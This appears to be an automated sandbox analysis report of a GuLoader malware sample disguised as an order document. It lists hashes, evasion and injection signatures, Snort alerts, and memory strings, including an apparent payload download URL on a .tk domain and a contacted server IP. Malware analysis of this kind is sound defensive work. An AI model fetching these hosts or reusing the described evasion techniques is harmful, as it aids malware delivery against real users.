Edit tour

Windows Analysis Report
Order_002376662-579588_Date 24082022.exe

Overview

General Information

Sample Name:	Order_002376662-579588_Date 24082022.exe
Analysis ID:	694559
MD5:	8c2a59bd88b7e2c26045a604ed544288
SHA1:	7efb014d57608ff6a2805baf4dd7c150792e6eb4
SHA256:	0d4b100e641aad426a916cb326d20f8fe44e32ca38f7a85c505135036c6b44af
Infos:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Snort IDS alert for network traffic

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Creates files inside the system directory

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

Order_002376662-579588_Date 24082022.exe (PID: 2812 cmdline: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" MD5: 8C2A59BD88B7E2C26045A604ED544288)

CasPol.exe (PID: 3112 cmdline: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)

conhost.exe (PID: 4392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000000.22683438457.0000000000F70000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.27549390202.0000000000F70000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Snort Signatures

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.11.20 - Destination IP: 1.1.1.1

Timestamp:	192.168.11.201.1.1.150882532012811 09/01/22-00:01:35.227375
SID:	2012811
Source Port:	50882
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Order_002376662-579588_Date 24082022.exe	Virustotal: Detection: 49%	Perma Link
Source: Order_002376662-579588_Date 24082022.exe	Metadefender: Detection: 27%	Perma Link
Source: Order_002376662-579588_Date 24082022.exe	ReversingLabs: Detection: 65%

Source: Order_002376662-579588_Date 24082022.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Platooned\Ananthropism

Jump to behavior

Source: Order_002376662-579588_Date 24082022.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\SourceCode\GC3.GPUPowerSaving\production_V4.2.12.3\Service\ConfigEditorCS\obj\Release\GPUPowerSavingConfigEditor.pdb source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_00405861
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0040639C FindFirstFileA,FindClose,	2_2_0040639C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_004026F8 FindFirstFileA,	2_2_004026F8

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.11.20:50882 -> 1.1.1.1:53

Source: global traffic

TCP traffic: 192.168.11.20:49785 -> 45.8.132.92:80

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000004.00000002.27549982400.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.27550375683.000000000110E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.24024275041.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.27550277584.00000000010FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32
Source: CasPol.exe, 00000004.00000002.27549674764.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32%dkm(
Source: CasPol.exe, 00000004.00000002.27549982400.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u324
Source: CasPol.exe, 00000004.00000002.27549862711.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u328c-95ce0233a7ccF_zm
Source: CasPol.exe, 00000004.00000002.27549862711.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u328c-95ce0233a7ccs
Source: CasPol.exe, 00000004.00000002.27549862711.00000000010B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u328c-95ce0233a7ccv
Source: CasPol.exe, 00000004.00000002.27549674764.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32Ie
Source: CasPol.exe, 00000004.00000002.27549982400.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32L
Source: CasPol.exe, 00000004.00000002.27549674764.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32Se
Source: CasPol.exe, 00000004.00000002.27549674764.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32ee
Source: CasPol.exe, 00000004.00000002.27549982400.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mnhckm.tk/ExpCRBJHZ225.u32v
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: Order_002376662-579588_Date 24082022.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Order_002376662-579588_Date 24082022.exe, 00000002.00000002.23341843175.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, GPUPowerSavingConfigEditor.dll.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

DNS traffic detected: queries for: mnhckm.tk

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_004052FE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004052FE

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Order_002376662-579588_Date 24082022.exe

Source: Order_002376662-579588_Date 24082022.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

Code function: 2_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_0040330D

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_00406725	2_2_00406725
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_00404B3D	2_2_00404B3D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03510E99	2_2_03510E99
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350035C	2_2_0350035C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350035E	2_2_0350035E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500340	2_2_03500340
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500B43	2_2_03500B43
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500344	2_2_03500344
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500F46	2_2_03500F46
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500748	2_2_03500748
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03507B48	2_2_03507B48
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350674B	2_2_0350674B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501B4C	2_2_03501B4C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500F71	2_2_03500F71
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501B7F	2_2_03501B7F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350676B	2_2_0350676B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A311	2_2_0350A311
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500316	2_2_03500316
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A71A	2_2_0350A71A
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350031D	2_2_0350031D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350031F	2_2_0350031F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03511B01	2_2_03511B01
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500B00	2_2_03500B00
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501B05	2_2_03501B05
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506306	2_2_03506306
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500331	2_2_03500331
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A331	2_2_0350A331
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500333	2_2_03500333
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500335	2_2_03500335
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500337	2_2_03500337
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500339	2_2_03500339
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350033B	2_2_0350033B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350033E	2_2_0350033E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500321	2_2_03500321
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500323	2_2_03500323
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500325	2_2_03500325
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500327	2_2_03500327
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350032A	2_2_0350032A
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350032C	2_2_0350032C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350032E	2_2_0350032E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03512F2F	2_2_03512F2F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035003D2	2_2_035003D2
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A3DE	2_2_0350A3DE
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501BC3	2_2_03501BC3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500FC8	2_2_03500FC8
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500BED	2_2_03500BED
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500396	2_2_03500396
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A788	2_2_0350A788
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500789	2_2_03500789
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350078D	2_2_0350078D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500B8F	2_2_03500B8F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500BB2	2_2_03500BB2
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035063B2	2_2_035063B2
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035007B6	2_2_035007B6
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035003A5	2_2_035003A5
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AFA8	2_2_0350AFA8
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500E5F	2_2_03500E5F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506641	2_2_03506641
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501A42	2_2_03501A42
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500675	2_2_03500675
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500260	2_2_03500260
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AA62	2_2_0350AA62
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03502A69	2_2_03502A69
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501E6D	2_2_03501E6D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03502A6E	2_2_03502A6E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500A6F	2_2_03500A6F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506615	2_2_03506615
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AA16	2_2_0350AA16
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500E1C	2_2_03500E1C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350021D	2_2_0350021D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350621F	2_2_0350621F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501A0F	2_2_03501A0F
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506636	2_2_03506636
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500639	2_2_03500639
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A623	2_2_0350A623
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350AA2D	2_2_0350AA2D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501E2E	2_2_03501E2E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500ED0	2_2_03500ED0
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A6D2	2_2_0350A6D2
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035002D6	2_2_035002D6
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035066DE	2_2_035066DE
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03507AC3	2_2_03507AC3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501AC9	2_2_03501AC9
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035066F0	2_2_035066F0
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500EF3	2_2_03500EF3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501AFA	2_2_03501AFA
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035006FB	2_2_035006FB
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500299	2_2_03500299
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501A81	2_2_03501A81
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506286	2_2_03506286
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03510A8C	2_2_03510A8C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501EB4	2_2_03501EB4
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500ABA	2_2_03500ABA
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035006BC	2_2_035006BC
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506EBD	2_2_03506EBD
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035066A3	2_2_035066A3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03507AA7	2_2_03507AA7
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350095B	2_2_0350095B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350015C	2_2_0350015C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500D5D	2_2_03500D5D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506148	2_2_03506148
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03507D4C	2_2_03507D4C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350A578	2_2_0350A578
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350196C	2_2_0350196C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03506510	2_2_03506510
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501916	2_2_03501916
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500119	2_2_03500119
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350091D	2_2_0350091D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350050B	2_2_0350050B
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500D3A	2_2_03500D3A
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350653A	2_2_0350653A
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501D24	2_2_03501D24
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501926	2_2_03501926
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03511927	2_2_03511927
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035019D0	2_2_035019D0
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03500DD0	2_2_03500DD0
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035079D3	2_2_035079D3
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035001D7	2_2_035001D7
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035005FB	2_2_035005FB
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035079FC	2_2_035079FC
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_035061EC	2_2_035061EC
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_03501DEF	2_2_03501DEF
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350199E	2_2_0350199E
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0351258D	2_2_0351258D
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350058C	2_2_0350058C
Source: C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe	Code function: 2_2_0350018E	2_2_0350018E
